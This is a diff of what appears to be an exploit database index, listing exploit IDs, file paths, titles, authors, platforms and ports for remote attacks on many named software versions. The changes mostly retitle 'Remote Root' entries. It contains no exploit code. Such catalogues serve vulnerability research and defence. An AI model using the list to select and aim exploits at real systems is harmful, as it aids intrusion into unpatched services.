1330,platforms/windows/remote/1330.c,"freeFTPd 1.0.8 - 'USER' Remote Buffer Overflow",2005-11-17,Expanders,windows,remote,21
|
||||
|
@ -9171,7 +9175,7 @@ id,file,description,date,author,platform,type,port
|
|||
2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
|
||||
2233,platforms/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - (SIZE) Remote Buffer Overflow",2006-08-21,h07,windows,remote,21
|
||||
2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21
|
||||
2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow",2006-08-26,muts,windows,remote,110
|
||||
2258,platforms/windows/remote/2258.py,"Alt-N MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow",2006-08-26,muts,windows,remote,110
|
||||
2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
|
||||
2274,platforms/linux/remote/2274.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)",2006-08-29,Expanders,linux,remote,0
|
||||
2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - (ActiveX) Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0
|
||||
|
@ -9226,11 +9230,11 @@ id,file,description,date,author,platform,type,port
|
|||
2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0
|
||||
2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - (Long Filename) Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69
|
||||
2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389
|
||||
2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21
|
||||
2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,linux,remote,21
|
||||
2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0
|
||||
2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0
|
||||
2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0
|
||||
3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21
|
||||
3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution",2003-10-15,"Solar Eclipse",linux,remote,21
|
||||
3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445
|
||||
3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002
|
||||
3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0
|
||||
|
@ -9318,7 +9322,7 @@ id,file,description,date,author,platform,type,port
|
|||
3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111
|
||||
3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0
|
||||
3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0
|
||||
3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow",2007-03-30,mu-b,linux,remote,53
|
||||
3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Buffer Overflow",2007-03-30,mu-b,linux,remote,53
|
||||
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143
|
||||
3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143
|
||||
3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0
|
||||
|
@ -9331,7 +9335,7 @@ id,file,description,date,author,platform,type,port
|
|||
3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0
|
||||
3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21
|
||||
3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80
|
||||
3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Remote Root Buffer Overflow",2007-04-10,c0ntex,linux,remote,0
|
||||
3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote,0
|
||||
3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0
|
||||
3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - (Specially Crafted 802.11 Packets) Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0
|
||||
3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,windows,remote,0
|
||||
|
@ -9358,7 +9362,7 @@ id,file,description,date,author,platform,type,port
|
|||
3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0
|
||||
3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Request Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080
|
||||
3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,windows,remote,0
|
||||
3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080
|
||||
3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080
|
||||
3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",windows,remote,113
|
||||
3927,platforms/windows/remote/3927.html,"DeWizardX - 'DEWizardAX.ocx' Arbitrary File Overwrite",2007-05-15,shinnai,windows,remote,0
|
||||
3934,platforms/windows/remote/3934.py,"Eudora 7.1 - SMTP ResponseRemote Remote Buffer Overflow",2007-05-15,h07,windows,remote,0
|
||||
|
@ -9588,19 +9592,19 @@ id,file,description,date,author,platform,type,port
|
|||
5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,windows,remote,0
|
||||
5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",windows,remote,0
|
||||
5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,multiple,remote,0
|
||||
5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0
|
||||
5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution",2008-03-09,DarkFig,linux,remote,0
|
||||
5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote,0
|
||||
5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0
|
||||
5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",windows,remote,0
|
||||
5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
|
||||
5248,platforms/windows/remote/5248.py,"Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
|
||||
5249,platforms/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
|
||||
5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0
|
||||
5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
|
||||
5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote,0
|
||||
5269,platforms/windows/remote/5269.txt,"MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0
|
||||
5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0
|
||||
5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution",2008-03-20,kingcope,solaris,remote,0
|
||||
5283,platforms/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0
|
||||
5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Root Exploit",2008-03-21,"Pranav Joshi",hardware,remote,0
|
||||
5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",hardware,remote,0
|
||||
5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0
|
||||
5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69
|
||||
5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69
|
||||
|
@ -9608,7 +9612,7 @@ id,file,description,date,author,platform,type,port
|
|||
5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0
|
||||
5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0
|
||||
5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510
|
||||
5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit (Metasploit)",2008-04-04,I)ruid,solaris,remote,0
|
||||
5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote,0
|
||||
5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
|
||||
5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
|
||||
5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0
|
||||
|
@ -9652,7 +9656,7 @@ id,file,description,date,author,platform,type,port
|
|||
6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80
|
||||
6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0
|
||||
6026,platforms/linux/remote/6026.pl,"Trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80
|
||||
6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)",2008-07-12,muts,linux,remote,80
|
||||
6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
|
||||
6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80
|
||||
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
|
||||
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
|
||||
|
@ -9713,7 +9717,7 @@ id,file,description,date,author,platform,type,port
|
|||
6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0
|
||||
6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0
|
||||
6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0
|
||||
6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111
|
||||
6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Code Execution",2008-10-19,kingcope,solaris,remote,111
|
||||
6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow",2008-10-20,InTeL,windows,remote,0
|
||||
6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0
|
||||
6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22
|
||||
|
@ -10125,11 +10129,11 @@ id,file,description,date,author,platform,type,port
|
|||
11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0
|
||||
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
|
||||
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
|
||||
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
|
||||
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0
|
||||
11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
|
||||
11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer - 'iepeers.dll' Use-After-Free Exploit (Metasploit)",2010-03-10,Trancer,windows,remote,0
|
||||
11694,platforms/windows/remote/11694.txt,"Skype - URI Handler Input Validation",2010-03-11,"Paul Craig",windows,remote,0
|
||||
11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0
|
||||
11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Code Execution",2010-03-13,"Mohammed almutairi",linux,remote,0
|
||||
11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0
|
||||
11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0
|
||||
11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21
|
||||
|
@ -10232,7 +10236,7 @@ id,file,description,date,author,platform,type,port
|
|||
14400,platforms/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14402,platforms/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
|
||||
14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
|
||||
14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Remote Root Hash Disclosure",2010-07-18,kingcope,aix,remote,0
|
||||
14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Hash Disclosure",2010-07-18,kingcope,aix,remote,0
|
||||
14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow (Metasploit)",2010-07-19,Madjix,windows,remote,0
|
||||
14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote,0
|
||||
14447,platforms/windows/remote/14447.html,"Multiple Web Browser (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0
|
||||
|
@ -10263,7 +10267,7 @@ id,file,description,date,author,platform,type,port
|
|||
14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0
|
||||
14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0
|
||||
14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
|
||||
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0
|
||||
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0
|
||||
14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0
|
||||
14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
|
||||
14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
|
||||
|
@ -10327,7 +10331,7 @@ id,file,description,date,author,platform,type,port
|
|||
15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,windows,remote,0
|
||||
15655,platforms/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow",2010-12-01,Dr_IDE,windows,remote,0
|
||||
15658,platforms/windows/remote/15658.rb,"Viscom Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit)",2010-12-02,bz1p,windows,remote,0
|
||||
15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21
|
||||
15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source (Trojan) Remote Code Execution",2010-12-02,anonymous,linux,remote,21
|
||||
15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
|
||||
15668,platforms/windows/remote/15668.html,"Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0
|
||||
15689,platforms/windows/remote/15689.py,"Freefloat FTP Server - Buffer Overflow",2010-12-05,0v3r,windows,remote,0
|
||||
|
@ -10388,7 +10392,7 @@ id,file,description,date,author,platform,type,port
|
|||
16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
|
||||
16259,platforms/windows/remote/16259.txt,"Home FTP Server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0
|
||||
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0
|
||||
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit",2011-03-04,"Todor Donev",hardware,remote,0
|
||||
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution",2011-03-04,"Todor Donev",hardware,remote,0
|
||||
16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
|
||||
16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0
|
||||
16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
|
||||
|
@ -10583,7 +10587,7 @@ id,file,description,date,author,platform,type,port
|
|||
16479,platforms/windows/remote/16479.rb,"IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
|
||||
16480,platforms/windows/remote/16480.rb,"MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
|
||||
16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0
|
||||
16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
|
||||
16482,platforms/windows/remote/16482.rb,"Alt-N MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
|
||||
16483,platforms/windows/remote/16483.rb,"Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16484,platforms/windows/remote/16484.rb,"Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
|
@ -10929,7 +10933,7 @@ id,file,description,date,author,platform,type,port
|
|||
16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution (Metasploit)",2011-03-15,Metasploit,windows,remote,0
|
||||
16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0
|
||||
16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution (Metasploit)",2011-03-16,Metasploit,multiple,remote,0
|
||||
16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
|
||||
16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
|
||||
16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer - CDDA URI Initialization (Metasploit)",2011-03-17,Metasploit,windows,remote,0
|
||||
17022,platforms/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0
|
||||
17024,platforms/windows/remote/17024.txt,"7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0
|
||||
|
@ -11083,7 +11087,7 @@ id,file,description,date,author,platform,type,port
|
|||
18051,platforms/windows/remote/18051.txt,"BroadWin Webaccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0
|
||||
18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0
|
||||
18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0
|
||||
18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0
|
||||
18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0
|
||||
18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow (DEP Bypass) (Metasploit)",2011-11-07,pasta,windows,remote,0
|
||||
18092,platforms/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote,0
|
||||
18093,platforms/windows/remote/18093.txt,"Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure Exploit",2011-11-07,"David Maman",windows,remote,0
|
||||
|
@ -11104,7 +11108,7 @@ id,file,description,date,author,platform,type,port
|
|||
18190,platforms/windows/remote/18190.rb,"RhinoSoft Serv-U FTPd Server < 4.2 - Buffer Overflow (Metasploit)",2011-12-02,Metasploit,windows,remote,0
|
||||
18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0
|
||||
18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - WebServer Stack Buffer Overflow (Metasploit)",2011-12-13,Metasploit,windows,remote,0
|
||||
18280,platforms/linux/remote/18280.c,"TelnetD encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0
|
||||
18280,platforms/linux/remote/18280.c,"TelnetD encrypt_keyid - Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0
|
||||
18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0
|
||||
18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS) Exploit",2011-12-30,cheffner,hardware,remote,0
|
||||
18984,platforms/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)",2012-06-05,Metasploit,multiple,remote,0
|
||||
|
@ -11229,8 +11233,8 @@ id,file,description,date,author,platform,type,port
|
|||
19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1 - Exploit",1998-06-30,"Jeff Forristal",multiple,remote,0
|
||||
19086,platforms/linux/remote/19086.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (1)",1999-02-09,"smiler and cossack",linux,remote,21
|
||||
19087,platforms/linux/remote/19087.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21
|
||||
19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Remote Root Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0
|
||||
19092,platforms/multiple/remote/19092.py,"MySQL - Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
|
||||
19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0
|
||||
